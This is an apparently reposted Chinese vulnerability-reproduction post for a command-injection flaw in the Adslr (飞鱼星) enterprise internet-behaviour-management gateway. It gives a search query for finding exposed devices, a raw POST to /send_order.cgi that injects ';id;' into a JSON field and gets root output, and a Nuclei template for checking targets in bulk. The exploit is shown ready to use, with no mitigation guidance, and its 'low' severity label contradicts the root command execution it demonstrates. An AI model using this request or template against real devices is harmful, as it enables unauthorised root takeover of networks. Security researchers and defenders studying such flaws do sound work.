飞鱼星企业级智能上网行为管理系统​ send_order.cgi 任意命令执行

资产收集

body="http://www.adslr.com/product/"

漏洞复现

发送请求

POST /send_order.cgi?parameter=operation HTTP/1.1Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Accept: */*Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: closeContent-Type: application/x-www-form-urlencoded{"opid":"1","name":";id;","type":"rest"}

返回包

HTTP/1.0 200 OKuid=0(root) gid=0(root) groups=0(root)Content-Length: 29{"type":1,"msg":"ok"}

批量验证脚本

id: ZH-2024-05-16-001

info:
  name: 飞鱼星企业级智能上网行为管理系统​ send_order.cgi 任意命令执行
  author: 仲瑿
  severity: low

http:
- raw:
  - |-
    @timeout: 30s
    POST /send_order.cgi?parameter=operation HTTP/1.1
    Host: {{Hostname}}
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
    Accept: */*
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Connection: close
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 40

    {"opid":"1","name":";id;","type":"rest"}

  matchers:
  - id: 1
    type: word
    part: header
    words:
    - uid=0(root) gid=0(root) groups=0(root)
    condition: and

原文始发于微信公众号（Devil安全）：【漏洞复现】飞鱼星企业级智能上网行为管理系统​ send_order.cgi 任意命令执行